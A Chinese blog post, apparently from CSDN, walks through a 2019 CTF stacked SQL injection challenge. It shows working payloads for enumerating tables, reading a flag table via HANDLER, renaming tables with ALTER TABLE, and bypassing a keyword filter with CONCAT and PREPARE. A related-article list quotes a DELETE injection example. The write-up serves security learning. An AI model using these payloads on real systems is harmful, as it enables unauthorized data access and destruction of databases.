sql注入练习6(堆叠注入)

最新推荐文章于 2023-04-03 16:27:37 发布
最新推荐文章于 2023-04-03 16:27:37 发布
阅读量326 收藏
点赞数
分类专栏: # sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39679772/article/details/106497085
版权

强网杯2019–随便注 super-sqli

(buu 或者攻防世界super-sqli)
一开始还是从最基本的union开始尝试
1’ 错
1’ or 1=1#正常
1’ order by 3#
1’ order by 2# 正常,说明2个字段
尝试union:
1’ union select 1,2#
在这里插入图片描述
发现常用的关键字都被绕过了,考虑堆叠注入
在这里插入图片描述
show tables;#
在这里插入图片描述
show columns from words;#
在这里插入图片描述
show columns from …
在这里插入图片描述

flag在1919810931114514表里面,但是select等都被过滤,因此提取不出来
注意:MySQL表名为纯数字时(表名和保留字冲突时也是加反引号),要加反引号

以下都是搜来的解决办法:(都好nb)

方法1:

1';handler `1919810931114514` open;handler `1919810931114514` read first;#

handler的用法
查阅官方文档

方法2:
页面默认查的是words表,将1919810931114514的表名和words交换;
修改表名和列名的语法如下:

修改表名(将表名user改为users)

alter table user rename to users;

修改列名(将字段名username改为name)

alter table users change uesrname name varchar(30);

最终payload如下:

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

方法3:
利用mysql的预处理。参考

预处理语句输入如下:

1';use supersqli;set @sql=concat('s','elect * from `1919810931114514`');PREPARE pre FROM @sql;EXECUTE pre;--+

set和prepare也是被绕过的
在这里插入图片描述
但是strstr()这个函数大小写敏感,所以把set改为大写,prepare也改为大写就可以绕过了

这里很巧妙的用concat绕过了关键字的检查

方法2的分析:唉这个方法还是得好好琢磨
根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id
1’ or 1=1#
w在这里插入图片描述
words表
在这里插入图片描述

这道题没有禁用rename和alert,所以我们可以采用修改表结构的方法来得到flag 将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了,但是它少了一个id列,可以将flag字段改为id,或者添加id字段

XDminiL id-wife

这好像一毛一样,放上师傅的wp
在这里插入图片描述
luoqian dl的
在这里插入图片描述

kkzz1x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入靶场.zip
06-24
靶场的核心是sqli-labs,这是一个开源的SQL注入练习平台,特别适合初学者和专业人士用来增强对SQL注入的理解。它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入堆叠...
SQL注入
最新发布
qq_63785498的博客
06-10 2351
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些表3、1';-- -查看表里面有哪些字段4、1';-- -查看表里面所有字段的内容。
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 843
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
SQL注入原理-堆叠注入
T1ngSh0w的博客
09-18 1198
SQL注入原理-堆叠注入 分为基于mysqli数据对象的注入和PDO数据对象的堆叠注入
SQL注入之宽字节注入堆叠注入、二次注入
m0_61506558的博客
09-17 1152
渗透的学习,必须要心无旁骛,通过靶场实战不断总结经验,vulnhub、hackthebox......这些靶场,如果有一个知识点没有掌握就会卡着动不了,之前整理sql注入的文章有点杂,主要原因是此部分内容较多。(一)宽字节注入如今有很多人在编码的时候,大多数人对程序的编码都使用unicode编码,网站都使用utf-8来一个统一国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。
SQL注入-堆叠注入
m0_53820621的博客
08-15 1390
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
SQL注入天书 sqli-labs
01-11
sqli-labs是一个精心设计的在线实验室,它包含了多个级别的SQL注入练习,从基础到高级,逐步引导学习者掌握不同类型的SQL注入技巧。每个级别都有详细的说明和解题提示,帮助学习者理解漏洞的成因和利用方法,以及...
数据库SQL注入攻击的全部资料打包
09-05
3. **堆叠查询**:利用某些数据库支持在同一查询中执行多个语句的特性,攻击者可以执行多个操作。 4. **时间延迟注入**:通过让查询等待一段时间再返回结果,攻击者可以确定特定条件是否满足。 **三、SQL注入攻击...
SXU-网络攻防第六次作业-sql注入进阶
12-27
本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入堆叠注入和宽字节注入,并给出相应的实践步骤。 首先,我们来看报错注入。报错注入是通过触发数据库错误来揭示敏感信息...
sqli-labs.7z
01-05
- **堆叠注入**:在一个查询中注入多个SQL命令。 - **UNION注入**:通过合并查询来显示其他表或列的数据。 3. 针对SQL注入的防御措施: - **输入验证**:确保所有用户输入符合预期格式。 - **参数化查询/预编译...
SQL Injection8(堆叠注入)——强网杯2019随便注
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠注入)——强网杯2019随便注 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便注是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
堆叠注入详解
爱上卿的博客
02-27 3415
0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中, 主要是命令行中,每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 0x01 堆叠注入原理 在SQL...
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3180
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
SQL注入(堆叠注入)——强网杯2019随便注
cc菜的一批
06-10 1367
感谢BUUCTF平台提供题目 0x00 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器
代码审计:云业cms后台注入漏洞复现
qq_43233085的博客
02-19 1395
代码审计:云业cms后台注入漏洞复现云业CMS漏洞寻找漏洞发现漏洞利用 云业CMS 云业CMS内容管理系统是由云业信息科技开发的一款专门用于中小企业网站建设的PHP开源CMS,可用来快速建设一个品牌官网(PC,手机,微信都能访问),后台功能强大,安全稳定,操作简单。 源码下载:https://www.mycodes.net/43/10244.htm 昨天发现的前台注入漏洞,拿到几个官方演示站点去测...
SQL注入堆叠注入(sql-lab第38关)
_Co1a
12-22 743
什么是堆叠注入 在SQL中,分号(;)是用来表示一条SQL语句结束的。试想一下我们在分号结束一个SQL语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而堆叠注入可以执行的是任意语句(增删改查)。 例如以下这个例子: 用户输入:1; delete from products服务器端生成的SQL语句为:select * from products where productid=1; delete from products当执行查询之后,第一条显示查询信息,第二条则是将整个表删除。
sql-堆叠注入
zhhhb1005的博客
08-14 507
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
SQL注入堆叠注入
07-15 936
【SQL-堆叠注入
堆叠注入--随便注
qq_43613772的博客
04-30 742
Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入可以执行任何人sql语句。但是当API或数据库引擎的不支持,堆叠注入就不能进行...
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQL、SQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值